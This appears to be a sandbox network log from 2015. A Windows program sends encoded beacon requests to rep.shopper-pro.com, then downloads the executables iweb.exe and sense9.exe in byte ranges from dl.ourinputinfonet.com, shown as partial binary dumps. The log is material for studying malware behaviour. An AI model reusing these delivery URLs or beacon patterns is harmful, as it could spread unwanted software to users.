Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: up.soft365.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14p1
Content-Encoding: gzip
14........................0..HTTP/1.1 200 OK..Server: nginx..Date: Sat
, 18 Apr 2015 23:36:35 GMT..Content-Type: text/html; charset=UTF-8..Tr
ansfer-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encodin
g..X-Powered-By: PHP/5.2.14p1..Content-Encoding: gzip..14.............
...........0..



GET /app/ping.ashx?e=1ZEnpGuz/ISSsSz5Gin3VuSrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBq2mie6K97bhs4164GCUCrHofaoyXCfoQIRgpbKKs6jK/sEUd/BCBLE 1KakB36ssAyR0VhWfLz7rzCOqouSiOX3iSFFCNvSibmv2IW2mkLW4Sygye4Bx OK6Bbaa/22ORm1WAVEoCJveNGyFHqLUA65EYBtUaaJ2Vte0h/YpXnsUyuixSI4KbCwH m 6Vr7WAZARP6Tt9fppq73FZdDH/8= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:37 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=1ZEnpGuz/ISSsSz5Gin3VuSrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBiYH9jylicula50u3XyigpVREcH6lvzpS2WA5XhQ4MoPBPFyFq4etD2F1daz2AcKxastnHeKqEA5dKHj74dJ/dxdnyqIR9QB0C 0KTRCdY9hVArsosbOUjUCKiRklP9YGqUs1rjapz18LnSy9mQHKSltjv7ItYHj4h8kpng0IpIJ HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:37 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=1ZEnpGuz/ISSsSz5Gin3VuSrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBq2mie6K97bhs4164GCUCrHY6 CMJNDnNVJ80QsygdrlOPofYEioTNmxiezSykY/Z9jP1QedMB/cy/B6ujnJrtI0fJ30mPWB3MJ9BqBjylb582wDWK7EtoEv86gftLd19X1D9868HonIj9NWOW5Z1BfUQsLxVIQuRwafNiz7i UXVi33qPwefc AZSpRiXLg4A== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:37 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=2v0SNuZrMFxLlRAfuGRpD SrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBiYH9jylicula50u3XyigpVREcH6lvzpS5NOnjhl29VMiawHEBbFjHDiLuGcd2F1x25D993ilxFQ7nJDKdFRkjljTyNjjzEEmvDlvHUGzrBfE5qLiEdalnTkFRMCFkWSPRZtwp8OumXRtkYVxBhYUpRK5JbDp8Lfwsf PLwbgUYljhKIPjTcuiw= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:38 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=s5Ydxb c7o0asVMAMALcPL0oSfJOuBg0J7P3DAC8IMDZhN5o5pkk8XKxIhAz9YyqMSx1JGlNOutOeXK1HgKvEMUWbVgwixNWcSwZ6/LEwZLppMdrwPpmw3scS/rum0dyUP gGlRflyueXXE4oNm6FfjcbTVOKlb2yahRH8NI3UnOryRtAxgTc80Ki/Lj0aHEBPFyFq4etD2F1daz2AcKxastnHeKqEA5dKHj74dJ/dxdnyqIR9QB0C 0KTRCdY9hVArsosbOUjUCKiRklP9YGqUs1rjapz18LnSy9mQHKSmc1BIhQjgGNR8kpng0IpIJ HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:38 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=blUJ6JGwk9K9KEnyTrgYNCez9wwAvCDA2YTeaOaZJPFysSIQM/WMqjEsdSRpTTrrTnlytR4CrxDFFm1YMIsTVnEsGevyxMGS6aTHa8D6ZsN7HEv67ptHclD/oBpUX5crnl1xOKDZuhXrGiiXWYz3NvgrB1VZh8CMsYns0spGP2fYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW fNsA1iuxLaBL/OoH7S3dfV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkcGnzYs 4vlFyjca/6c/zCZgGUqUYly4OA= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:38 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=s0jsdppK9OufZNC1TqAoBD8Ciqt5ctYfTEgCpOx0T0GQL2F0hg1RiTdGGPs8AIHkGuSf5ccJqhPvYQ7YSDf5fSyjQRapHyYcv34ni8kUorZmnaU FLUhgrONeuBglAqxQKd0GEgkaflVZ4RT0d23GHcO0aQLqLvPZ1qa tRBmxIEmumfnn3eLsmQ gNabH9smt1LIHE9GmAmMGUjfC0lQ4bieN4dwMAiQCgrTWge9c5pV1IGllrHIPLxQ3i9AquwzS5r6mtOURHi5n nh6YVLffopz0y2Q7Y HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:38 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 18 Apr 20
15 23:35:38 GMT..Content-Length: 0......


GET /app/ping.ashx?e=obiBp3WOda WjDTOqhvSEb0oSfJOuBg0ZkAbtSTrnD/ZhN5o5pkk8XKxIhAz9YyqMSx1JGlNOutOeXK1HgKvEMUWbVgwixNWcSwZ6/LEwZLppMdrwPpmw4FF6f/a06pCWjwfqp7MHxGpMWXGXOfhUiXwmSZn9bL3CkMpf9re0fn3iSFFCNvSibmv2IW2mkLW4Sygye4Bx OK6Bbaa/22ORm1WAVEoCJveNGyFHqLUA65EYBtUaaJ2Vte0h/YpXnsUyuixSI4KbCwH m 6Vr7WDk4k9vngPPGpq73FZdDH/8= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:40 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=fx25sIC5hWOfZNC1TqAoBLUntwt5bxURTEgCpOx0T0GQL2F0hg1RiTdGGPs8AIHkGuSf5ccJqhPvYQ7YSDf5fSyjQRapHyYcv34ni8kUorY0A75TMG4v BbKdUb4fSU3inFskWrXAmXG4Lnbcm9hh1KSSkgkzJM10ClxJsX5qO1ZySIyJVh8l6AwGw39X SP66QyS6DOQJjDeGRS0pnnebdYnK0cLSUmH4Gg7nL31GCT2C22Pl6Okd10EwQxdzjoDxJ w6ryxW8= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: rep.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:41 GMT
Content-Length: 0



GET /spd/shopp/iweb.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:26 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429363844"
Last-Modified: Sat, 18 Apr 2015 13:30:44 GMT
Cache-Control: max-age=3333
Content-Length: 250000
Content-Range: bytes 0-249999/11194736
Content-Type: application/x-msdownload
X-HW: 1429400126.dop010.am4.t,1429400126.cds051.am4.c
Content-Disposition: attachment; filename="iweb.exe"
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@.......................... 
......./........ ..............................p..........(C..........
......................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]...@....... [email protected]...(C.
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



1..w....h..;[email protected]#.......I#h.L f?.8V.%..
.~.._6.-..W.=;....5..U...........H..ra..j....F`.%<.....[vx...M.i.,b
Z.'-&K. f.n.....d-..9.._z2.b..'..~..Kr|....r%...Q....W.I[......o.V...m
.  ....t.w.....v...<...^4.d:..YR..Ju3%.^.v.H*.-....(....c......^[gn
E!E.9........2ljoa.Y.B ..%.\}....0.37....._<...m..nFp}...x...R.%.E.
<..4.f.Te.."!.a...'..5....N .....m|...<Q.]7.7>er.../_..v.Y...
o\i%UlT..O8I3'.....\d...;d.vS'......?*....Z..B.sR^w..-.\.,z.6:-dW.....
.X..Q. s.1.B..b..5.t...>...f...[.W.8d3.k1...U..{..w..m^.....93..Tg.
6...]..D,...1........H..|...........Xrm(...E.......ib......@v<...=.
..W.R....c.Z.S.....J....!d..]JZ.........c......Ra;S.c.`..H... ::.JL..z
B.I..1./.~.q.....hm.Z....Mq.]...J...JF.Fa.H .l<D_. [...a...w...,.H.
..A.t......./..]~`...oc..Zn....wro..(X.e).;t.<%.6...)..v.Q>.,F?.
..f*.<y/.$>.ga........g.....=.;*>....v.}.b...........V......x
...=?.\....K7P.B....1?..@.......%[email protected].\...:.3vL.Q.
}P.J4.o.D...te..bXfK.mJBJ<U6.K....z..;)...,.0...Gs....._ ....D.j..(
.......".e.]H...:\ao.V.[A.B9.y...r.....1.z...e_....L....:..B.$........
.O.?..'.bvln..~..u(H._.Oy..K..6...I7C.......X...0.E.;*.7.QM...Sm.1zo|.
...e..|..O..hM.v ....{....%@k..C1..Q..P.t.zX7(...pL5..?.....L...B|.hRr
.q...$...b.8_.....=..s2....!.h.....iTD.D..[ ./@s.......B..5...W.e.P!p.
HI.I:[email protected].._..u.d...,... `B...#..0I%hU.V.W....2O.}...,.
o..n.(..8c.9............E....&...9.B....F$9.<.....9..tM.0..}k.P.f.s
.(..uX.,.....)[email protected]/..K.{.........y...%j..1.m3..I..{.
<<< skipped >>>

GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=500000-749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



..J....Y.oJ.,..hxi...E.-m...O....`pH.^.Bqv....N...].Sr$.....Wp.V~tA9..
n.2....6..>[email protected] T. tm.r.!..]>X..S5Z&...u..(|.n..y ....B.mE
.^....C...M.T.;q...36....a..~.!^.>.:[email protected].:..e.B............
....7~t.P..x..,.f.i...C.;..F..O.....3w.8.3......9F".......3.'.....X...
....i.5nX....QZZu........h..6..|..'HF.l|"iIV^...I...K..m.|v..H.....0..
EY~....n-^.._...S.E.)....~...f.....a;....eh. ............?.."..q.j....
s.k.H......1x...=.C.a.G.. ..M....:3ht.&f....a7.6.Q..G.|...0<..q.4.G
t...B....,.{..sT.......H'7.:06.......1....#c.C5.....w1......(......7..
u..?.4....T...HJ....$V............CNT..8..ko!f......q(3...*?y[..:.J#0'
%..p7...N..[...;<]!.9...D..&.....{..w.K..\{.Q...?*.'.\z.....C..G...
1......../EZ:...b....e<YG..w#Q..u...$..nU....N~nG/.....RA%c."......
.<....49d.M....w7k7.y...SW......).........j.....p(.....}.rD.j\9....
..j..=.dm.]...Y..Vo.._._.1.'. ...8.S..B..[h3..w..T....P.^!.#.J..#.v.X.
@.,Q2.......Lm.....D.2<...M....9Rp...d.......-..\S.".XVZS.....n..n.
<J:l..g.....q.c^..Q.....Jt........mz)i......\..:.......N...P2....i2
.r.....X.{.N.~8...e}R..VU.2#^.......[./a.....Cd..EP\,...F...U.6.$...0.
.......F.pz........NR.Z.^Og.e...|....z2<.7G..,N..K..Sj0.Wc...i.."z.
.x...N.\.8cF..........8E.L.khe.[l..8......yH...#.UQK....Cm....%.q..s..
i.......%.8.G....i..R5>.x)t..~...V4.......O.c..i.l.T./Ii.S.........
~.....(g..ba@@i.....Py..m.$..O..!"R.k;.{.e...........\.N...MB..r...S..
[email protected]/]J...3.?/........~..X]h]._.%.../...m.}%.....)..a...?....9.K
..?.l.!....d5.2)...,..6y.....{nO...z..=c8K.........])&.[.Z..`b..s.
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=750000-999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



\H6{V.#..F [email protected]...,4|...l................iX}I.H..{\7..w...9..D...
B....(?f.]...c........*..H"..m.........[Pq..P.pd...u..7..........X..XE
([email protected],.........u[....e...\......M..i...;...J....h.x47..3..|qL..
.r...u..^.......Q ..|..S.^..W..M.5.d........DU..$(.\.uv..1..|3-V......
...i..z.."o...D.jm...]F3...[...1!.....q......l:..<.5..Nx>|.k.f..
..K....{ ....48$kf.D..(.s.J.[..F#v.n.....L)X6..\..6........peXv&j.....
...Q'"4.....=......nt.@....]`[email protected]....{h..0..q.......3%...`
.$........{.......-K...=U.......VL...,...ajmV`..B....`[email protected]
.b..n..v:.4.....e..=.Q...W.5'.u.].%.... [email protected]*....we
.......d.\w..1.......O.....<.<.{.m%.Kx.u.......*[email protected]......\.9
Y...76T.Y.h...A.;...S.a.............-&#n:>4.......L..R.b.G<..N.:
9,9......U.<......~..i.)..c......iF.^...zyR.,;...5...kp'...w.s.*.!.
cA......V.&mIc.w.y.s.....M..c.}..&..%..U\. .c..!q.Yz.}!{..`.;)...%...3
...i...3s`.a.....fb'j.w<6.S..vk^*..w..Y.;1.....8....JZIN7{.m/m..$!.
NMka,^..}...1.\_ ....7Jn.....J{}}8]..O. .2.........`._...P./f.B..E..r.
&|..fX.0#..N..Wf.....G.).z...r...N,G.ou.3......y%....n...`t.....;\3.W.
...d...)Y.]ln..Aj..%-.d%.]X..u,y..p..(.;.X.'.....b.......F..Bl\.6$..29
5k.W.=..H...k....=y.p,..\o....,.....w.*..._.....y.^%[email protected]..
.`.c.,g..fu....{.,...?..P.'%..n].>....t\....@B1.;.K.....`... ...?t.
.2g.5d.. [email protected]...^....(......i.....:_-.......%).....j..
..uc<%..0.....3W.1=.~.x...b..a.3 .....>....eMEh...jA............
..N..#y...\....y....Y.....!..)! ...<.....?.<h.K..... Icyu!.$
<<< skipped >>>

GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=1000000-1249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:27 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429363844"
Last-Modified: Sat, 18 Apr 2015 13:30:44 GMT
Cache-Control: max-age=3332
Content-Length: 250000
Content-Range: bytes 1000000-1249999/11194736
Content-Type: application/x-msdownload
X-HW: 1429400127.dop010.am4.t,1429400127.cds051.am4.c
Content-Disposition: attachment; filename="iweb.exe"
E7..OeH.T..P..c.E8#.Ty-.....W[_.......................^.k..G5.k....9.[
].JX.....d.M..Mt.a....#...P.O......J....s.t....YOd.....9..&c[.........
......L........t....pt.9..lT0...I|0....\...jh?.'...8J....K...-..!1.z}j
.:Y4.n.hkA...'...^;D.....q...0.Z.M...!.h.~.)...2. S..T..!y..c#.a..Z!.!
.W..4.........fMnonh...e.;.d.H^.O....(,......o....u.?...'jC..c...Ub..&
..)*.......r.G..$...?...$T.u.e.O.-SdW.........4........3.'.b.....u."..
.EE.Iqwh..{.."h.bU....q!.%{,..x.....s..H....tH....NH.4).....I.wzt_..l.
V.Q-w...H_...w.....J.f............DZ...o,.L.<....@.#.G...S,FB.....P
...._..6...]..t...(O(.f....... ..2.D.QX.......%.0...."........O.&`:.C.
.3...h............)...X.a....EY..0...X.T...j....F.n.o..Z....&6t.k...E.
6A.....GI....-x.Y...,..F..t..}..lA4..-..\%~4.%...`./2.Q4...&^..1...c..
.x..#w#...J....p](...,.`D....>b)V.....p.X..r...r#..g........9&X../q
..z.66.ap5C:[email protected]$.l.h."..5..R..ZQUkMh1.P......4..$...'..iMx
...../.Ap.U_...s....g.....(.xB....z.L"...4.......N.V...m....2. ~.c....
...aTw.C|o.zD.../... .[.9.h.......)/.V:...cLC..>..D..E...G..B6]i]..
0..5....=l....d......Q.A.X"...1.:....r.....yi...)...Y(A!..;.]e.t..}.7.
B....Z,.<.C...<<........$...KoG..1......np. !S.vtV....>G.~
..4.....~.K......h.....q=.'s=.ea...W..F...~O8"...j.OI....<.&..z....
..{\....z..T.:i.x...%....(,..L...V....E..u...p.Q.._.j)=.....d._..rE...
`[email protected]..%I._.2.[...6.?\[email protected]..*....x.&l
t;f...6...d.j.Ui..k..8......z...d ..q#...:Mh.....i..:ZW....)U..3;vj...
....S.z..e...&...u;U&>..vy.....F-.5..........F.`fW{Hp....e...F6
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=1250000-1499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



/.q5...C"..3{..r.5~>.<Z.......s.i.....T*B.R.B.?.y..D@.;O.)......
G..PL<e.v..z.h.!.....t.2...".T._E.|$o.Qi..>...p...c.|.b....T.Z..
.4!P...P......u....Q....l.&.._.3.c.SODk.....?.\:5.....j.{.Gn...X.....x
<...l......f..*....B.......l.H/.h..MAqr.. .5!.......##...adW..[.3..
....t...%s.x....].U..n...bN.7N8.. ..i4"..:.K..s.0.P/Vk...O./cc#4`Gr..{
./.|..".X.x........p/\...A...5..q..r.RO[....g".|.5.([email protected].~..p...(~..
..yJ]..z..y|...F....8..%.......t.A..E.*....|....|...6....)'P..t.&=zPBW
W'.....q...wm.@BM#......C9....XF_..c5 .~..Q..t...u;..!i....z......&Ik.
.K~i|..Cf)...^2..bNx#..(.v.qzcUS*..9..D..m.Q.qJ.p.[G.c&R..S2j.J..|T...
@-.b...W....2.1'|......../...a8.....'.<......[.jba|p..)X9....~..K..
....).....I...n...E291'.=v.P..#....l.P{Yg.x.?.@..\p..0.7........u.J...
.......#.tZ*......^._7.e..W...w'..L iQ....kG.....V&...3&....]v.7.....D
V.|wk.-;,.W..E..A.^d..o..r..g....P..W...4...Z.VH .%...K-2...h)j..vx...
w..Tu....%..n."I..)F..6.....&..p...&r4......a.Y...E..<...._SW&.....
...@|.....O[..=.?...8..fD.U....L.o.....i\>f........W.76..;^ .);..@.
.....#........O.$...E...hm2m0..0J...H~h.)....S^[email protected]....=..
....t.Zg..f....&..Cn..@..{.IYt..h.....l.<.....C..J......,..n3iM..:.
.AE!..}.).5.........3..5....)...W..dp.g..&\.~F.._$.!7...Bl.Q.~..}.]s.K
...Nz. 1 D1....W.B..''Fo..^....G,../.9/....A..._/r..#8.A.'..O.2.6...o.
.X.....F{.3H...J....~.$B..r...xlG..f.....|.>.3...#..E...|)g...x.;(v
.../..J..M............. .M=.g...}o....N...-Z..........;.n.x.$*........
.........S.*..g./...!........;..{{....B.b. o.G...;_'.9|...........
<<< skipped >>>

GET /spd/shopp/iweb.exe HTTP/1.1


Range: bytes=1500000-1749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:27 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429363844"
Last-Modified: Sat, 18 Apr 2015 13:30:44 GMT
Cache-Control: max-age=3332
Content-Length: 250000
Content-Range: bytes 1500000-1749999/11194736
Content-Type: application/x-msdownload
X-HW: 1429400127.dop010.am4.t,1429400127.cds051.am4.c
Content-Disposition: attachment; filename="iweb.exe"
....


GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=1750000-1999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/iweb.exe HTTP/1.1
Range: bytes=1750000-1999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/sense9.exe HTTP/1.1
Range: bytes=2250000-2499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



..Y...X..c.....M.s.)..*".`.S0....k........D..t...}A...x..$$..X..,^0...
.Q......q..!..|..<..v&.r.o.!.....<.e...q....:......<R.7... ]=
[email protected].,E/....d._.b.|GZw..y......y...P7.c7..|..B...........P......
'.<".7,.e.r}g_8.......mq.2o..4.....{R.;.....K..*....z.n.s.c.....4.|
.GoJ.T...R..'..<[email protected].}JzQf..
xi.gy]........w.~..}^..".;..Q^..,TR.Y2-.;X....?z..i.V[..K........a.?.w
E.....y. k...6.y...q6M'.(......v..NF..L. [email protected]>W.....
.lk........`$.c)...uP.?',K.-.!M*.......j...BP:C.N........m)N..h..5|...
6....X\.z.?*l". ......1...7...v.9|......u....6N...D..s...-P..h.....0a.
..$.Y.|..Q^..5....7&..8.o.^.;...^fubY.p..K.g ..JY.{...`.dnJ......._.m.
T.$..........-.N.4.....rH."...}..F...'l..D~.:O..^ei...i...}....C.....p
.....u......B.......{\..Nf...\.....]L..1...X.%(.. .Y.C.iv....W..hh.k..
...Dv....9.a.<h.I....e]"-7.V...|..._J..r..6*.g.W..E[.....7.h......d
.....^...8K.:............g.....V [s..1...7h...B..*..-....dZ,/..<Y..
..-...W.< o..........j...g P........{.JE.H.".h3.D.c.....!...B.;..w*
..Z...-....3Sw\.1....s.<......ck(.#.^.e9".^5.o.M..T.|.....S.ju.V...
[email protected].%..D..r.....~i..j..C..=.......xcMn.oQ......
..x...%..[.}...u...~s... ........h.ki...>...(_....q,..w.h...c]}..yi
.Y...K.MmU.-.i.Qj.*.\.v.j.S'.....p..Q....r-..A......zU....W.5d.I...*.c
..dd..m?........#...=n......J......h*.5.Tx..p.....*[.Y.)v....').......
..........4cX.}.!w.].....uA......Qf.ew.O...a.........6.......1......a.
.GX..Y...p/.^...[...~.v..y.c..h.............G.q.jLA./..5...*..D...
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=2750000-2999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive

GET /spd/shopp/sense9.exe HTTP/1.1
Range: bytes=3250000-3499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:28 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429364166"
Last-Modified: Sat, 18 Apr 2015 13:36:06 GMT
Cache-Control: max-age=52
Content-Length: 250000
Content-Range: bytes 3250000-3499999/11323780
Content-Type: application/x-msdownload
X-HW: 1429400128.dop010.am4.t,1429400128.cds060.am4.c
Content-Disposition: attachment; filename="sense9.exe"
.A.[.[......$... ....Q[I..W.......,.."..L....s/@x..U..J^............&l
t;Op...ZS.3.F...|Y.m.jTi*.bF.8..?w...i...T......E....ZO..g....."@Mc|V.
zY..u. ..8.o....jn....c.{...AV.q..b..]....:.rx\[email protected]...`s}
.J..).b.....#[email protected].%b.....O.dE...F........T.h.....K..h2.....T...
`.X.r.gE2.e....!......{..........M........7<...V7..z)..2...,....{..
`.F."9.l...?>..%~.M.=..A.K......P.n.b../.p[]kS .....B3.6...G.......
........\..S.g..V.j..:.......(.P.-.....O...F.`.d.4....q.l..!.(........
...LU.q..0.{...G.....I..........?.9....!N...k..47.<.'l.....9..f.$.(
.g4.......HI9.....K......i..7U......`~G.P:....<.1.b...,&%..........
P. ../[email protected]_2..6.....|.P.2z.....Z.....|..H.
[email protected][email protected]$.v.o.#.!..v..>........^.5......... .M
....{..b2D....1..0....=[."..iV(.r...=..'g.F~"...C,A..w.. ..9.BKf..Ux..
......*Q.%.9..N.!.....:../..C.z.....\-..[........4.&.`.?.DH.....\...d.
..v.n..t(..BF..5..{..!%q. ....Ex...^..9..|....e.&.!=.#B<.&.E.ge..#g
P.7..`..w.U<]e$...~...-...5......Eg...T.Ok..p.....~T.]WG..|dnpJ..G.
.8..;.Fh.S.l....FF....B%:...j.......m.............Fne.......B_./....{.
.."I.S Fw.1...QM2.2......w.G..9jm..U(.....n.^A.>....0....9.....7.,.
C..g...>..G....o....x>=.&....U<.B/*...*...!(.... K9..Q..6L.&x
-..|.h......r.A6.......D.....d.R.............)....i. ..n....z....bP.q^
}.....D...`..O.....41..<6.R.<..pR...`z>Ir.2.90..[...3.....u.T
^.zb$.......8[.............|W.;T...`.&,.........6Y..e~..W9....*..m..".
...H..LT......Q..4.w.(.in*..D.g. .^r..........i.L..e............a1
<<< skipped >>>

GET /spd/shopp/sense9.exe HTTP/1.1


Range: bytes=3500000-3749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:28 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429364166"
Last-Modified: Sat, 18 Apr 2015 13:36:06 GMT
Cache-Control: max-age=52
Content-Length: 250000
Content-Range: bytes 3500000-3749999/11323780
Content-Type: application/x-msdownload
X-HW: 1429400128.dop010.am4.t,1429400128.cds060.am4.c
Content-Disposition: attachment; filename="sense9.exe"
.Z........S._.{........0G.=..\.J.o:.....j.L..-.z..)T-..6J...Jj..6o.u.x
o8.kF.Ls\..0...u...y."..-.&\.........r.......c....:m........'.l4@...).
..u...[..h*- .....Q...'X..._.7.r..C.{..7QA.....g.i(8.B...L..y.........
69.9..w...yx...2N.V. .3..g.R.c.I.N.1..L=.....a.d.J......2..@.....%.H..
.d...l.=..:.......I......"....hT}.z...C.a}.Q.RDr......3....<R*..S.&
